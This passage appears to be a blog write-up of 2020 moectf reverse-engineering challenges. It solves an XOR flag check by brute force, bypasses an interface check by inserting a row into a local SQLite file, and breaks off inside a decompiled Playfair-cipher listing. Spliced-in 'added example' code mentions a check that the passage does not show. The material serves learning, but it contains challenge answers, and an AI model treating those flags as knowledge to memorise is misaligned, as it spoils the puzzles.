BufferedReader(<span class="keyword">new</span> InputStreamReader(System.in));</span><br><span class="line"> String str = <span class="keyword">null</span>;</span><br><span class="line"> <span 
class="keyword">int</span>[] arrayOfInt = { </span><br><span class="line"> <span class="number">43</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">62</span>, <span class="number">110</span>, <span class="number">66</span>, <span class="number">94</span>, <span class="number">99</span>, <span class="number">126</span>, <span class="number">68</span>, </span><br><span class="line"> <span class="number">43</span>, <span class="number">62</span>, <span class="number">76</span>, <span class="number">110</span>, <span class="number">22</span>, <span class="number">5</span>, <span class="number">15</span>, <span class="number">111</span>, <span class="number">86</span>, <span class="number">75</span>, </span><br><span class="line"> <span class="number">78</span>, <span class="number">83</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">85</span>, <span class="number">86</span> };</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> str = bufferedReader.readLine();</span><br><span class="line"> } <span class="keyword">catch</span> (Exception exception) {</span><br><span class="line"> System.out.println(<span class="string">"ERROR: Undefined Exception."</span>);</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">if</span> (str.isEmpty()) {</span><br><span class="line"> System.out.println(<span class="string">"Nothing received."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (str.length() != <span class="number">35</span>) { <span class="comment">// the flag is 35 characters long</span></span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> String str1 = str.substring(<span 
class="number">0</span>, <span class="number">7</span>); </span><br><span class="line"> <span class="keyword">if</span> (!str1.equals(<span class="string">"moectf{"</span>)) {</span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> String str2 = str.substring(<span class="number">7</span>, str.length() - <span class="number">1</span>); <span class="comment">// strip the "moectf{" prefix and the trailing "}"</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// core check: every pair of adjacent characters, XORed, must equal arrayOfInt[b]</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">byte</span> b = <span class="number">0</span>; b < str2.length() - <span class="number">1</span>; b++) { </span><br><span class="line"> <span class="keyword">char</span> c1 = str2.charAt(b);</span><br><span class="line"> <span class="keyword">char</span> c2 = str2.charAt(b + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">int</span> i = c1 ^ c2;</span><br><span class="line"> <span class="keyword">if</span> (i != arrayOfInt[b]) {</span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> } </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> System.out.println(<span class="string">"Congratulations!"</span>);</span><br><span class="line"> } </span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Only the core section needs a close look: XOR again... and XOR is its own inverse, so let's go!!!</p><p>The <code>flag</code> is 35 characters; stripping the head and the tail leaves 27, but the internal array has only 26 entries, each the XOR of two adjacent characters. So there is no way to run it backwards directly: choosing any one character fixes all the others, and the array alone cannot tell us which choice is right. Since the <code>flag</code> is meaningful text, we brute-force the first character forward over printable ASCII, rebuild the rest from the array, and pick the readable line!!!</p><blockquote><p>Brute force works wonders; lookup tables win the provincial first prize.</p></blockquote><figure class="highlight c++"><table><tr><td class="gutter"><pre><span 
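class="line"></span></pre></td></tr></table></figure><p>(Added example, not the writeup's code; the C++ brute force follows below it.) Two ways to undo the XOR checks from this writeup while guessing at most one byte. For EzJava the stored array holds <code>s[i] ^ s[i+1]</code>, so the whole string is fixed once <code>s[0]</code> is chosen: walk the chain for every printable first byte and keep the candidates that stay printable, which is what the C++ below leaves to the eye. For the Real EasyPython check above, brute force is not needed at all: for a byte <code>x</code>, <code>x >> 4</code> only touches the low nibble, so <code>y = x ^ (x >> 4)</code> keeps the high nibble of <code>x</code>, and applying the same transform to <code>y</code> returns <code>x</code>. The arrays are the ones from the two listings; the function names are this example's own.</p>

```python
"""Undoing the EzJava pairwise-XOR chain and the Real EasyPython nibble XOR.
Added example, not the writeup's own code."""
import string

# EzJava: arrayOfInt from the decompiled class, arrayOfInt[b] == c[b] ^ c[b+1]
EZJAVA_DIFFS = [43, 23, 23, 62, 110, 66, 94, 99, 126, 68,
                43, 62, 76, 110, 22, 5, 15, 111, 86, 75,
                78, 83, 86, 0, 85, 86]

# Real EasyPython: key[i] == (ord(c) >> 4) ^ ord(c)
EASYPY_KEY = [115, 76, 50, 116, 90, 50, 116, 90, 115, 110, 48, 47, 87, 48, 103, 50,
              106, 126, 90, 48, 103, 116, 126, 90, 85, 126, 115, 110, 105, 104, 35]

PRINTABLE = set(string.printable) - set(string.whitespace)


def walk_chain(diffs, first: int) -> str:
    """Rebuild the string from adjacent XORs given its first byte (the one degree of freedom)."""
    out = [first]
    for d in diffs:
        out.append(out[-1] ^ d)
    return "".join(map(chr, out))


def chain_candidates(diffs):
    """Every printable first byte whose reconstruction stays printable throughout."""
    return [s for s in (walk_chain(diffs, c) for c in range(0x20, 0x7F))
            if all(ch in PRINTABLE for ch in s)]


def nibble_xor(x: int) -> int:
    """The check from the Real EasyPython script."""
    return (x >> 4) ^ x


def undo_nibble_xor(y: int) -> int:
    """Inverse of nibble_xor on bytes: the high nibble survives, so y >> 4 == x >> 4."""
    return (y >> 4) ^ y


def recover_easypython_flag() -> str:
    return "".join(chr(undo_nibble_xor(k)) for k in EASYPY_KEY)


if __name__ == "__main__":
    for cand in chain_candidates(EZJAVA_DIFFS):
        print("moectf{%s}" % cand)  # the readable line is the flag
    print("moectf{%s}" % recover_easypython_flag())
```

<p>The printable filter usually leaves a handful of candidates that differ by a constant XOR, so a human still picks the readable one; extending the filter with a dictionary or a leetspeak check would rank them automatically.</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span 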
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> b[<span class="number">50</span>]={<span class="number">43</span>,<span class="number">23</span>,<span class="number">23</span>,<span class="number">62</span>,<span class="number">110</span>,<span class="number">66</span>,<span class="number">94</span>,<span class="number">99</span>,<span class="number">126</span>,<span class="number">68</span>,<span class="number">43</span>,<span class="number">62</span>,<span class="number">76</span>,<span class="number">110</span>,<span class="number">22</span>,<span class="number">5</span>,<span class="number">15</span>,<span class="number">111</span>,<span class="number">86</span>,<span class="number">75</span>,<span class="number">78</span>,<span class="number">83</span>,<span class="number">86</span>,<span class="number">0</span>,<span class="number">85</span>,<span class="number">86</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> n=<span 
class="number">32</span>;n<=<span class="number">126</span>;n++) <span class="comment">// try every printable ASCII value as the first character</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">char</span> rel[<span class="number">100</span>]={<span class="number">0</span>}; <span class="comment">// zero-filled, so the 27-char result is NUL-terminated when printed</span></span><br><span class="line">rel[<span class="number">0</span>]=n;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line"> rel[i+<span class="number">1</span>]=b[i]^rel[i]; <span class="comment">// XOR is self-inverse: next = (cur ^ next) ^ cur</span></span><br><span class="line"><span class="built_in">cout</span><<rel<<<span class="string">"\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Reverse/image-20201016201934908.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016201934908.png" srcset="" alt="image-20201016201934908"></p><blockquote><p>moectf{Java_1s-N0t_a-CUP_0f-c0ff3e}</p></blockquote><h3 id="RollCall"><a href="#RollCall" class="headerlink" title="RollCall"></a>RollCall</h3><p>This challenge is a bit special...</p><p><img src="/images/2020moectf-Reverse/image-20201016202556170.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016202556170.png" srcset="" alt="image-20201016202556170"><img src="/images/2020moectf-Reverse/image-20201016202614496.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016202614496.png" srcset="" alt="image-20201016202614496"></p><p>Both the challenge text and the <code>hint</code> are telling us one thing: <strong>this program cannot be reversed</strong>!!! Let's see what is inside the program package???</p><p><img src="/images/2020moectf-Reverse/image-20201016203039925.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016203039925.png" srcset="" alt="image-20201016203039925"></p><p>Hmm? A <code>.sqlite</code> file??? That is a database file, so we can guess that the students' data is stored in that database, and if the program will not let us add a student whose sex is 2, we can operate on the database directly.</p><p>
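<p>RollCall's check on the sex field lives only in its UI; the SQLite file it trusts enforces nothing, which is exactly why a direct insert works. As an added example (not the challenge's or this write-up's code), the Python below rebuilds the <code>students</code> table from the column names the write-up's PRAGMA output shows (ID, name, sex, averange), repeats the write-up's direct insert, and shows what a schema-level CHECK constraint would have done instead. The 0/1 encoding of sex, the CHECK constraint and the sample rows are assumptions.</p>

```python
"""Added example for the RollCall challenge (not the challenge's or the write-up's
code).  The app validates the sex field in its UI only; the SQLite file it ships
enforces nothing, so a direct INSERT bypasses the check.  Column names follow the
write-up's PRAGMA output (ID, name, sex, averange); the 0/1 encoding of sex, the
CHECK constraint and the sample rows are assumptions."""
import sqlite3

# The row the write-up inserts with the sqlite3 shell.
ROW = (233, "BlackBird", 2, 2)


def make_db(enforce_schema_check: bool) -> sqlite3.Connection:
    """Build an in-memory copy of the 'students' table.

    enforce_schema_check=False mirrors the challenge's unconstrained table;
    True adds the constraint the application should have put in the schema.
    """
    con = sqlite3.connect(":memory:")
    constraint = ", CHECK (sex IN (0, 1))" if enforce_schema_check else ""
    con.execute(
        "CREATE TABLE students (ID INTEGER PRIMARY KEY, name TEXT, "
        "sex INTEGER, averange REAL" + constraint + ")"
    )
    # Constructed sample rows, using the assumed 0/1 encoding of sex.
    con.executemany("INSERT INTO students VALUES (?, ?, ?, ?)",
                    [(1, "Alice", 0, 90.5), (2, "Bob", 1, 77.0)])
    con.commit()
    return con


def app_add_student(con: sqlite3.Connection, row: tuple) -> bool:
    """The application-layer path: the UI rejects anything but sex 0 or 1
    (assumed) before the row ever reaches the database."""
    _id, _name, sex, _avg = row
    if sex not in (0, 1):
        return False
    con.execute("INSERT INTO students VALUES (?, ?, ?, ?)", row)
    con.commit()
    return True


def direct_insert(con: sqlite3.Connection, row: tuple) -> bool:
    """The write-up's path: talk to the database file directly, skipping the UI.
    Only a schema-level constraint can stop this; report whether it did."""
    try:
        con.execute("INSERT INTO students VALUES (?, ?, ?, ?)", row)
        con.commit()
        return True
    except sqlite3.IntegrityError:  # raised when the CHECK constraint fails
        return False


def rows_with_sex(con: sqlite3.Connection, sex: int) -> list:
    """Return (ID, name) of every student with the given sex value."""
    return con.execute(
        "SELECT ID, name FROM students WHERE sex = ? ORDER BY ID", (sex,)
    ).fetchall()


def demo(enforce_schema_check: bool) -> dict:
    """Run both insertion paths against a fresh table and report the outcome."""
    con = make_db(enforce_schema_check)
    return {
        "ui_accepted": app_add_student(con, ROW),
        "direct_accepted": direct_insert(con, ROW),
        "sex2_rows": rows_with_sex(con, 2),
    }


if __name__ == "__main__":
    for hardened in (False, True):
        print("schema CHECK enabled:", hardened, demo(hardened))
```

Without the constraint the UI refuses the row but the direct insert lands it; with the constraint both paths are refused, which is the fix the write-up's trick points at.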
I opened <code>wsl</code>, installed the <code>sqlite</code> command-line tool there and used an <code>insert</code> statement to add a record whose sex is 2:</p><blockquote><p>sudo apt install sqlite3</p><p>sqlite3 UserData</p><p>.tables // list the tables in this database, which gives: students</p><p>PRAGMA table_info(students); // list every column of the students table: ID, name, sex, averange</p><p>INSERT INTO students VALUES (233, 'BlackBird', 2, 2 );</p></blockquote><p>Then open the program again:<img src="/images/2020moectf-Reverse/image-20201017014608397.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201017014608397.png" srcset="" alt="image-20201017014608397"></p><h3 id="MidPython"><a href="#MidPython" class="headerlink" title="MidPython"></a>MidPython</h3><p>Emmmm... reversing a <code>pyc</code> file starts with decompiling it, again with the <code>uncompyle6</code> used above, but this time it reports an error??? Let's open the "half-cooked" <code>py</code> file (half Python source, half bytecode): (very long code warning!!!)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span 
class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span 
class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span 
class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span 
class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span 
class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span 
class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span 
class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span 
class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br><span class="line">511</span><br><span class="line">512</span><br><span class="line">513</span><br><span class="line">514</span><br><span class="line">515</span><br><span class="line">516</span><br><span class="line">517</span><br><span class="line">518</span><br><span 
class="line">519</span><br><span class="line">520</span><br><span class="line">521</span><br><span class="line">522</span><br><span class="line">523</span><br><span class="line">524</span><br><span class="line">525</span><br><span class="line">526</span><br><span class="line">527</span><br><span class="line">528</span><br><span class="line">529</span><br><span class="line">530</span><br><span class="line">531</span><br><span class="line">532</span><br><span class="line">533</span><br><span class="line">534</span><br><span class="line">535</span><br><span class="line">536</span><br><span class="line">537</span><br><span class="line">538</span><br><span class="line">539</span><br><span class="line">540</span><br><span class="line">541</span><br><span class="line">542</span><br><span class="line">543</span><br><span class="line">544</span><br><span class="line">545</span><br><span class="line">546</span><br><span class="line">547</span><br><span class="line">548</span><br><span class="line">549</span><br><span class="line">550</span><br><span class="line">551</span><br><span class="line">552</span><br><span class="line">553</span><br><span class="line">554</span><br><span class="line">555</span><br><span class="line">556</span><br><span class="line">557</span><br><span class="line">558</span><br><span class="line">559</span><br><span class="line">560</span><br><span class="line">561</span><br><span class="line">562</span><br><span class="line">563</span><br><span class="line">564</span><br><span class="line">565</span><br><span class="line">566</span><br><span class="line">567</span><br><span class="line">568</span><br><span class="line">569</span><br><span class="line">570</span><br><span class="line">571</span><br><span class="line">572</span><br><span class="line">573</span><br><span class="line">574</span><br><span class="line">575</span><br><span class="line">576</span><br><span class="line">577</span><br><span class="line">578</span><br><span 
class="line">579</span><br><span class="line">580</span><br><span class="line">581</span><br><span class="line">582</span><br><span class="line">583</span><br><span class="line">584</span><br><span class="line">585</span><br><span class="line">586</span><br><span class="line">587</span><br><span class="line">588</span><br><span class="line">589</span><br><span class="line">590</span><br><span class="line">591</span><br><span class="line">592</span><br><span class="line">593</span><br><span class="line">594</span><br><span class="line">595</span><br><span class="line">596</span><br><span class="line">597</span><br><span class="line">598</span><br><span class="line">599</span><br><span class="line">600</span><br><span class="line">601</span><br><span class="line">602</span><br><span class="line">603</span><br><span class="line">604</span><br><span class="line">605</span><br><span class="line">606</span><br><span class="line">607</span><br><span class="line">608</span><br><span class="line">609</span><br><span class="line">610</span><br><span class="line">611</span><br><span class="line">612</span><br><span class="line">613</span><br><span class="line">614</span><br><span class="line">615</span><br><span class="line">616</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># uncompyle6 version 3.7.3</span></span><br><span class="line"><span class="comment"># Python bytecode 3.8 (3413)</span></span><br><span class="line"><span class="comment"># Decompiled from: Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:57:54) [MSC v.1924 64 bit (AMD64)]</span></span><br><span class="line"><span class="comment"># Embedded file name: ./EzPython/source.py</span></span><br><span class="line"><span class="comment"># Compiled at: 2020-07-25 16:57:06</span></span><br><span class="line"><span class="comment"># Size of source mod 2**32: 5784 bytes</span></span><br><span class="line">Instruction context:</span><br><span class="line"> </span><br><span 
class="line"> L. <span class="number">76</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line">-> 416 JUMP_FORWARD 430 'to 430'</span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line">Instruction context:</span><br><span class="line"> </span><br><span class="line"> L. <span class="number">118</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line">-> 416 JUMP_FORWARD 430 'to 430'</span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line">T_letter = [<span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Create_Matrix</span>(<span class="params">key</span>):</span></span><br><span class="line"> key = Remove_Duplicates(key)</span><br><span class="line"> key = key.replace(<span class="string">' '</span>, <span class="string">''</span>)</span><br><span class="line"> j = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(key)):</span><br><span class="line"> T_letter[j] += key[i]</span><br><span class="line"> <span class="keyword">if</span> <span class="number">0</span> == (i + <span class="number">1</span>) % <span class="number">5</span>:</span><br><span class="line"> j += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span 
class="function"><span class="keyword">def</span> <span class="title">Remove_Duplicates</span>(<span class="params">key</span>):</span></span><br><span class="line"> key = key.upper()</span><br><span class="line"> _key = <span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> ch <span class="keyword">in</span> key:</span><br><span class="line"> <span class="keyword">if</span> ch == <span class="string">'I'</span>:</span><br><span class="line"> ch = <span class="string">'J'</span></span><br><span class="line"> <span class="keyword">if</span> ch <span class="keyword">in</span> _key:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> _key += ch</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> _key</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Get_MatrixIndex</span>(<span class="params">ch</span>):</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(T_letter)):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span 